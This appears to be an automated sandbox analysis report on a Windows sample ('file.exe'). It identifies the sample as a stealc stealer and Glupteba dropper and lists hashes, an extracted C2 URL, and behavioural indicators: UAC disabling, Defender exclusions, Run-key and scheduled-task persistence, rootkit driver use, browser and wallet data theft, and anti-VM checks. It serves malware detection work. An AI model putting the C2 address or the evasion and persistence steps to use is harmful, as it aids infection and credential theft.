Analysis
-
max time kernel
149s -
max time network
147s -
platform
windows10-2004_x64 -
resource
win10v2004-20231222-en -
resource tags
arch:x64arch:x86image:win10v2004-20231222-enlocale:en-usos:windows10-2004-x64system -
submitted
26-01-2024 19:05
Static task
static1
Behavioral task
behavioral1
Sample
file.exe
Resource
win7-20231215-en
General
-
Target
file.exe
-
Size
23KB
-
MD5
13e50553cf74404e0667de093b05d4bb
-
SHA1
d2b4e780b13305b25cba7cd3b2259d94d84120a8
-
SHA256
8f1db790b8dcd0cfa72966ee8702bfd44c52600a290e40285b21bd6f356c12c5
-
SHA512
23f9cbf9e32dbe4f5238e10d9b41d47adb80815122d69c2717e35b1a166c0b45a4767bba52c8c793a2d73f8abe4d9abd0ac57e62b1490d4ef86b3ec639d2a18c
-
SSDEEP
384:2uBq0csxekW8SepChIaSpZAuIrl/6Hx4QZb7DFN24uNDZOEv+45GoGCJEF8ZpHbY:cS8oHhxNhuLOyrEFiR1tM
Malware Config
Extracted
stealc
http://185.172.128.79
-
url_path
/3886d2276f6914c4.php
Signatures
-
Glupteba payload 10 IoCs
resource yara_rule behavioral2/memory/4900-105-0x0000000005050000-0x000000000593B000-memory.dmp family_glupteba behavioral2/memory/4900-110-0x0000000000400000-0x0000000002EF4000-memory.dmp family_glupteba behavioral2/memory/1828-150-0x0000000000400000-0x0000000002EF4000-memory.dmp family_glupteba behavioral2/memory/4900-395-0x0000000000400000-0x0000000002EF4000-memory.dmp family_glupteba behavioral2/memory/3236-508-0x0000000000400000-0x0000000002EF4000-memory.dmp family_glupteba behavioral2/memory/748-511-0x0000000000400000-0x0000000002EF4000-memory.dmp family_glupteba behavioral2/memory/748-583-0x0000000000400000-0x0000000002EF4000-memory.dmp family_glupteba behavioral2/memory/3236-675-0x0000000000400000-0x0000000002EF4000-memory.dmp family_glupteba behavioral2/memory/3888-818-0x0000000000400000-0x0000000002EF4000-memory.dmp family_glupteba behavioral2/memory/3888-833-0x0000000000400000-0x0000000002EF4000-memory.dmp family_glupteba -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" file.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths file.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\file.exe = "0" file.exe -
Blocklisted process makes network request 2 IoCs
flow pid Process 5 3204 rundll32.EXE 131 1956 rundll32.exe -
Downloads MZ/PE file
-
Modifies Windows Firewall 2 TTPs 2 IoCs
pid Process 4776 netsh.exe 3560 netsh.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe -
Checks computer location settings 2 TTPs 4 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\International\Geo\Nation file.exe Key value queried \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\International\Geo\Nation Install.exe Key value queried \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\International\Geo\Nation nsl94EF.tmp Key value queried \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\International\Geo\Nation TPkxaYo.exe -
Drops startup file 8 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\aL2IuM4gQp1mXtAZ2CnvA4DF.bat CasPol.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mJtVUb0XRWSs0oGv0FkHaqSC.bat CasPol.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\34LkNeVgI0H4SdmBPumu5RJO.bat CasPol.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CRYzhcnoZlUh83W9IhBO4wzs.bat CasPol.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ct4QP4ZTdGd8bPt2W3RgHpvh.bat CasPol.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\2uPBtVP5UCc2EPXPhhFU388W.bat CasPol.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SxkTBr69nv1PhgnJ1LizXIKa.bat CasPol.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EUXkZR7mGJge0jloEKhFM3na.bat CasPol.exe -
Executes dropped EXE 26 IoCs
pid Process 1496 Zj91d9v5NpNUsLuVMDIaf2ST.exe 3208 BroomSetup.exe 4900 4BB4lI7t5tls4oaeCojmPguo.exe 1828 tb4IzGgTXDqdahLq6zcyrMSD.exe 1996 nsl94EF.tmp 4240 SR8r1fGXkfJwLNsVVFuqln2W.exe 3236 4BB4lI7t5tls4oaeCojmPguo.exe 748 tb4IzGgTXDqdahLq6zcyrMSD.exe 656 aH61TFChdeJtMgESTog4SHo0.exe 2152 aH61TFChdeJtMgESTog4SHo0.exe 4736 aH61TFChdeJtMgESTog4SHo0.exe 1816 aH61TFChdeJtMgESTog4SHo0.exe 4756 aH61TFChdeJtMgESTog4SHo0.exe 4676 SMWfDLGtgBUDr1BgQF6ZSW2T.exe 2672 Install.exe 2508 Install.exe 3888 csrss.exe 2860 Assistant_106.0.4998.16_Setup.exe_sfx.exe 2008 assistant_installer.exe 3584 assistant_installer.exe 2056 0oZh5cYXBl8lBcDmHCsfbXMu.exe 3532 injector.exe 2744 windefender.exe 1204 windefender.exe 3088 OHhyuzm.exe 4712 TPkxaYo.exe -
Loads dropped DLL 14 IoCs
pid Process 1496 Zj91d9v5NpNUsLuVMDIaf2ST.exe 1496 Zj91d9v5NpNUsLuVMDIaf2ST.exe 656 aH61TFChdeJtMgESTog4SHo0.exe 2152 aH61TFChdeJtMgESTog4SHo0.exe 4736 aH61TFChdeJtMgESTog4SHo0.exe 1816 aH61TFChdeJtMgESTog4SHo0.exe 4756 aH61TFChdeJtMgESTog4SHo0.exe 1996 nsl94EF.tmp 1996 nsl94EF.tmp 2008 assistant_installer.exe 2008 assistant_installer.exe 3584 assistant_installer.exe 3584 assistant_installer.exe 1956 rundll32.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral2/files/0x0006000000023275-237.dat upx behavioral2/files/0x0006000000023275-247.dat upx behavioral2/files/0x0006000000023275-258.dat upx behavioral2/files/0x0006000000023275-270.dat upx behavioral2/files/0x0006000000023284-275.dat upx behavioral2/memory/4736-290-0x0000000000640000-0x0000000000B28000-memory.dmp upx behavioral2/files/0x0006000000023275-297.dat upx behavioral2/files/0x0006000000023275-310.dat upx behavioral2/memory/2744-826-0x0000000000400000-0x00000000008DF000-memory.dmp upx behavioral2/memory/1204-838-0x0000000000400000-0x00000000008DF000-memory.dmp upx -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths file.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions file.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\file.exe = "0" file.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 3 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" csrss.exe Set value (str) \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" tb4IzGgTXDqdahLq6zcyrMSD.exe Set value (str) \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" 4BB4lI7t5tls4oaeCojmPguo.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA file.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" file.exe -
Drops Chrome extension 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json TPkxaYo.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json TPkxaYo.exe -
Drops desktop.ini file(s) 1 IoCs
description ioc Process File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini TPkxaYo.exe -
Enumerates connected drives 3 TTPs 4 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\D: aH61TFChdeJtMgESTog4SHo0.exe File opened (read-only) \??\F: aH61TFChdeJtMgESTog4SHo0.exe File opened (read-only) \??\D: aH61TFChdeJtMgESTog4SHo0.exe File opened (read-only) \??\F: aH61TFChdeJtMgESTog4SHo0.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 15 pastebin.com 16 pastebin.com -
Manipulates WinMonFS driver. 1 IoCs
Roottkits write to WinMonFS to hide directories/files from being detected.
description ioc Process File opened for modification \??\WinMonFS csrss.exe -
Drops file in System32 directory 38 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData TPkxaYo.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\D4579ED561AFE0AD26F688A8C9A41CC6 TPkxaYo.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA TPkxaYo.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol TPkxaYo.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 TPkxaYo.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 TPkxaYo.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 TPkxaYo.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content TPkxaYo.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\D4579ED561AFE0AD26F688A8C9A41CC6 TPkxaYo.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA TPkxaYo.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F2DDCD2B5F37625B82E81F4976CEE400_39B83AB13ED8E512BB8030E3672AA4B8 TPkxaYo.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive 0oZh5cYXBl8lBcDmHCsfbXMu.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive reg.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive Conhost.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE TPkxaYo.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA TPkxaYo.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies TPkxaYo.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft TPkxaYo.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A16C6C16D94F76E0808C087DFC657D99_E8C9186ED5BC2F64FC58A60C8F09BA16 TPkxaYo.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache TPkxaYo.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 TPkxaYo.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA TPkxaYo.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E87CE99F124623F95572A696C80EFCAF_91A876CD48120717E0EA4ECAEF92BD40 TPkxaYo.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini OHhyuzm.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2DDCD2B5F37625B82E81F4976CEE400_39B83AB13ED8E512BB8030E3672AA4B8 TPkxaYo.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A16C6C16D94F76E0808C087DFC657D99_E8C9186ED5BC2F64FC58A60C8F09BA16 TPkxaYo.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E87CE99F124623F95572A696C80EFCAF_91A876CD48120717E0EA4ECAEF92BD40 TPkxaYo.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol OHhyuzm.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 3592 set thread context of 8 3592 file.exe 92 -
Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 2 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.
description ioc Process File opened (read-only) \??\VBoxMiniRdrDN 4BB4lI7t5tls4oaeCojmPguo.exe File opened (read-only) \??\VBoxMiniRdrDN tb4IzGgTXDqdahLq6zcyrMSD.exe -
Drops file in Program Files directory 14 IoCs
description ioc Process File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi TPkxaYo.exe File created C:\Program Files (x86)\gNEkwGGiCnIU2\tHiPbPbXcrrzN.dll TPkxaYo.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak TPkxaYo.exe File created C:\Program Files (x86)\IAvstfEYU\NBWSAaH.xml TPkxaYo.exe File created C:\Program Files (x86)\sdTGWCKIydsYsNrSARR\soJdzzj.dll TPkxaYo.exe File created C:\Program Files (x86)\sdTGWCKIydsYsNrSARR\IqHUwPy.xml TPkxaYo.exe File created C:\Program Files (x86)\WNdNVmbTRKpEC\AKSmBxu.dll TPkxaYo.exe File created C:\Program Files (x86)\WNdNVmbTRKpEC\LOkkeeb.xml TPkxaYo.exe File created C:\Program Files (x86)\DufnooWHNFUn\rROOvEg.dll TPkxaYo.exe File created C:\Program Files (x86)\IAvstfEYU\HPPXrz.dll TPkxaYo.exe File created C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi TPkxaYo.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak TPkxaYo.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja TPkxaYo.exe File created C:\Program Files (x86)\gNEkwGGiCnIU2\BThYRuO.xml TPkxaYo.exe -
Drops file in Windows directory 10 IoCs
description ioc Process File created C:\Windows\rss\csrss.exe tb4IzGgTXDqdahLq6zcyrMSD.exe File opened for modification C:\Windows\rss 4BB4lI7t5tls4oaeCojmPguo.exe File created C:\Windows\windefender.exe csrss.exe File created C:\Windows\Tasks\bmfUAJAHieefCXsdaD.job schtasks.exe File created C:\Windows\Tasks\drPQSDndGmRZEFerX.job schtasks.exe File opened for modification C:\Windows\rss tb4IzGgTXDqdahLq6zcyrMSD.exe File created C:\Windows\rss\csrss.exe 4BB4lI7t5tls4oaeCojmPguo.exe File opened for modification C:\Windows\windefender.exe csrss.exe File created C:\Windows\Tasks\HddpujWaDpLIbkLdt.job schtasks.exe File created C:\Windows\Tasks\gcsaRhxvmhmmEZS.job schtasks.exe -
Launches sc.exe 1 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 4404 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 4272 1996 WerFault.exe 104 -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 nsl94EF.tmp Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString nsl94EF.tmp -
Creates scheduled task(s) 1 TTPs 14 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1460 schtasks.exe 2448 schtasks.exe 3484 schtasks.exe 4024 schtasks.exe 2740 schtasks.exe 4952 schtasks.exe 2004 schtasks.exe 548 schtasks.exe 1164 schtasks.exe 4268 schtasks.exe 2100 schtasks.exe 4492 schtasks.exe 5080 schtasks.exe 2812 schtasks.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 1444 timeout.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-721 = "Central Pacific Daylight Time" tb4IzGgTXDqdahLq6zcyrMSD.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates Conhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-731 = "Fiji Daylight Time" tb4IzGgTXDqdahLq6zcyrMSD.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-1662 = "Bahia Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1831 = "Russia TZ 2 Daylight Time" 4BB4lI7t5tls4oaeCojmPguo.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople reg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs Conhost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-492 = "India Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-1862 = "Russia TZ 6 Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-2141 = "Transbaikal Daylight Time" windefender.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs 0oZh5cYXBl8lBcDmHCsfbXMu.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" reg.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-1832 = "Russia TZ 2 Standard Time" windefender.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed Conhost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-92 = "Pacific SA Standard Time" windefender.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs reg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-2371 = "Easter Island Daylight Time" windefender.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates Conhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates 0oZh5cYXBl8lBcDmHCsfbXMu.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-262 = "GMT Standard Time" windefender.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-182 = "Mountain Standard Time (Mexico)" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2062 = "North Korea Standard Time" 4BB4lI7t5tls4oaeCojmPguo.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-962 = "Paraguay Standard Time" 4BB4lI7t5tls4oaeCojmPguo.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" 0oZh5cYXBl8lBcDmHCsfbXMu.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates 0oZh5cYXBl8lBcDmHCsfbXMu.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-751 = "Tonga Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2161 = "Altai Daylight Time" tb4IzGgTXDqdahLq6zcyrMSD.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-2161 = "Altai Daylight Time" windefender.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates Conhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-502 = "Nepal Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-451 = "Caucasus Daylight Time" tb4IzGgTXDqdahLq6zcyrMSD.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-562 = "SE Asia Standard Time" tb4IzGgTXDqdahLq6zcyrMSD.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-334 = "Jordan Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2752 = "Tomsk Standard Time" tb4IzGgTXDqdahLq6zcyrMSD.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root reg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates reg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-11 = "Azores Daylight Time" windefender.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ 0oZh5cYXBl8lBcDmHCsfbXMu.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-104 = 